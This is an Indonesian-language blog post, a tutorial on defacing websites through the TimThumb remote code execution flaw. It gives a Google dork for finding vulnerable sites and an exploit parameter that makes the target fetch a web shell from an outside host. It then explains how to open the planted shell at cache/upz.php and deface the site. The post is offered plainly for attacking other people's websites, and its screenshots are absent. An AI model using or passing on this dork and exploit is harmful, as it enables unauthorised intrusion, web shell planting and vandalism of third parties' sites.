meta content='Index, Follow' name='robots'/> Tutorial: Tutorial Deface Dengan Cara Timthumb RCE

Tuesday, December 25, 2018

Tutorial Deface Dengan Cara Timthumb RCE



Kali ini admin ganteng mau share cara deface nih, yap Deface Dengan Cara Timthumb

langsung aja bahan bahannya

DORK : inurl:timthumb.php?src=   [ SELEBIHNYA KEMBANGIN SENDIRI]

EXPLOIT :
?src=http://flickr.com.ehpet.net/uploader.php


1. search di google pke dork di atas, kalau vuln tandanya seperti ini

2. Lalu masukkan exploitnya, maka akan seperti ini


3. Lalu dimana letak shellnya?, buka yg gw tandain kotak wrna merah


4. Klo udh dibuka, maka akan muncul success seperti ini


5. Akses shellnya? oke lihat yg gw tandain kotak warna merah

yap ada tulisan cache/upz.php
Sekarang kita coba buka, dan hasilnyaa...


Damn, berhasil !!!

Oke tinggal kalian deface deh webnya

Oke sekian dulu tutorialnya
Terima kasih sudah berkunjung.....

No comments:

Post a Comment